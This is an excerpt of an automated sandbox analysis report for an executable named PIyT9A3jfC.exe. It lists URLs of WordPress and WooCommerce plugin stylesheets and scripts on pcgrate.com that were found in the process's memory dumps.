                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/css/front.css?ver=1.3.7
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
